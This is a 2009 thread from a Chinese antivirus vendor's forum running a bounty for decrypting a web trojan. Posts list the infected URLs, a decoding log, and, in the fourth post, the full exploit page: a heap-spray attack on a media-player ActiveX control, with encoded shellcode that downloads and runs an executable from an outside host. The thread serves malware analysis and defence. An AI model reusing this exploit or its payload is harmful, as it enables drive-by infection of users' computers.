恶意网站交流区网马解密悬赏第八期(已结束) - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流恶意网站交流区网马解密悬赏第八期(已结束)

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[悬赏] 恶意网站交流区网马解密悬赏第八期(已结束)

本主题由版主 networkedition 于 2009-7-8 15:02:12 执行关闭主题/取消操作

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-08 13:34 \| 只看楼主短消息资料字号：小中大 1楼恶意网站交流区网马解密悬赏第八期(已结束) 引用: http://www.rzgl.gov.cn/img/storm.htm 引用: 规则：1.一次解完并附解密日志和步骤（包含swf和pdf网马），奖赏10威望，如果部分解出，每步奖赏2威望； 2.对于积极参与此活动会员，并多次中奖者，我们可以诚邀加入卡卡反病毒小组引用: 解密工具： Freshow（中文版） Redoce（中文版） Malzilla （汉化版）引用: 在线解析站点： http://glacierlk.cn/openlab/jm.htm http://www.cha88.cn/ 引用: 注：卡卡反病毒小组成员禁止参加引用: 恶意网址来源瑞星全功能安全软件拦截到真实有效的地址用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) networkedition 最后编辑于 2009-07-08 15:04:59
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	分享到：

QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:	发表于： 2009-07-08 13:40 \| 短消息资料字号：小中大 2楼回复: 恶意网站交流区网马解密悬赏第八期关于:hxxp://www.rzgl.gov.cn/img/storm.htm解密的日志(全体输出 - 2): Level 0>http://www.rzgl.gov.cn/img/storm.htm Level 1>http://www.rz168.com/edit/x.exe ● 日志由 Redoce1.9第68次修正版于 2009-7-8 下午 01:39:08 生成。 1.jpg (81.20 K) 2009-7-8 13:40:06 就解出一个本帖被评分 1 次本帖被评分 1 次
QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:

happysunday2003 叱咤花甲狮帖子:4313 注册: 2007-08-15 来自:358团	发表于： 2009-07-08 14:11 \| 短消息资料字号：小中大 3楼回复：恶意网站交流区网马解密悬赏第八期失效了？ <meta http-equiv='refresh' content='3; url=/main.htm'>错误提示：<br><br>您访问的域名不存在，请确认输入了正确的网址。<br>系统2秒钟后将自动转向日照百事通主站，请稍候........................
happysunday2003 叱咤花甲狮帖子:4313 注册: 2007-08-15 来自:358团

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-08 14:21 \| 只看楼主短消息资料字号：小中大 4楼没有失效 [复制到剪贴板] CODE: <html> <object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id='target'></object> <body> <SCRIPT language="JavaScript"> var shellcode1 = "tmp54EBtmp758Btmp8B3Ctmp3574tmp0378tmp56F5tmp768Btmp0320tmp33F5tmp49C9tmpAD41tmpDB33tmp0F36tmp14BEtmp3828tmp74F2tmpC108tmp0DCBtmpDA03tmpEB40tmp3BEFtmp75DFtmp5EE7tmp5E8Btmp0324tmp66DDtmp0C8Btmp8B4Btmp1C5EtmpDD03tmp048Btmp038BtmpC3C5tmp7275tmp6D6Ctmp6E6Ftmp642Etmp6C6Ctmp4300tmp5C3Atmp2e55tmp7865tmp0065tmpC033tmp0364tmp3040tmp0C78tmp408Btmp8B0Ctmp1C70tmp8BADtmp0840tmp09EBtmp408Btmp8D34tmp7C40tmp408Btmp953Ctmp8EBFtmp0E4EtmpE8ECtmpFF84tmpFFFFtmpEC83tmp8304tmp242CtmpFF3Ctmp95D0tmpBF50tmp1A36tmp702Ftmp6FE8tmpFFFFtmp8BFFtmp2454tmp8DFCtmpBA52tmpDB33tmp5353tmpEB52tmp5324tmpD0FFtmpBF5DtmpFE98tmp0E8Atmp53E8tmpFFFFtmp83FFtmp04ECtmp2C83tmp6224tmpD0FFtmp7EBFtmpE2D8tmpE873tmpFF40tmpFFFFtmpFF52tmpE8D0tmpFFD7tmpFFFFtmp7468tmp7074tmp2F3Atmp772Ftmp7777tmp722Etmp317Atmp3836tmp632Etmp6D6Ftmp652Ftmp6964tmp2F74tmp2E78tmp7865tmp0065"; var shellcode = unescape(shellcode1.replace(/tmp/g,"%u")); var nop = "tmp9090tmp9090"; var dsffsgdfg = unescape(nop.replace(/tmp/g,"%u")); while (dsffsgdfg.length<141) dsffsgdfg+=dsffsgdfg; fillvcbcv = dsffsgdfg.substring(0, 141); vcbcv = dsffsgdfg.substring(0, dsffsgdfg.length-141); while(vcbcv.length+141<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv; gdfgdh = new Array(); for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode; var knell = ''; while (knell.length < 4057) knell+='\x0a\x0a\x0a\x0a'; target.rawParse(knell); </script> </body>
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

gtyre2 快乐黄口狮帖子:179 注册: 2009-07-02 来自:	发表于： 2009-07-08 14:23 \| 短消息资料字号：小中大 5楼回复：恶意网站交流区网马解密悬赏第八期暴风影音的 var shellcode1 = 。。。。。。。。
gtyre2 快乐黄口狮帖子:179 注册: 2009-07-02 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT